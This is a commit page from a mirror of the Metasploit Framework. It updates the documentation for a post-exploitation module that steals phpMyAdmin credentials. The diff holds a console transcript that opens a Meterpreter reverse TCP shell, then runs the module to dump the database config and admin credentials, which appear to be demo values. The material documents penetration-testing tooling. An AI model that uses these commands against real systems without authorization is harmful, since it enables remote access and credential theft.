infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

modified doc to reflect new output

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-09-06 12:11:14 -05:00
parent 6c3b1081ea
commit 50df5e386a
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 25 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
View File

@ -15,36 +15,33 @@ This post module gathers PhpMyAdmin Creds from target Linux machine.
## Scenarios
```
msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400
msf5 post(linux/gather/phpmyadmin_credsteal) > use multi/handler
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run
msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1
SESSION => 1
msf post(linux/gather/phpmyadmin_credsteal) > exploit
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (816260 bytes) to 192.168.37.226
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2
session => 2
msf5 post(linux/gather/phpmyadmin_credsteal) > run
PhpMyAdmin Creds Stealer!
[+] PhpMyAdmin config found!
[+] Extracting config file!
<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded. *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='phpmyadmin';
$dbpass='Passw0rd';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';
[+] Extracting creds
[+] User: admin
[+] Password: acoolpassword
[*] Storing credentials...
[*] Post module execution completed
msf post(linux/gather/phpmyadmin_credsteal) >
msf5 post(linux/gather/phpmyadmin_credsteal) >
```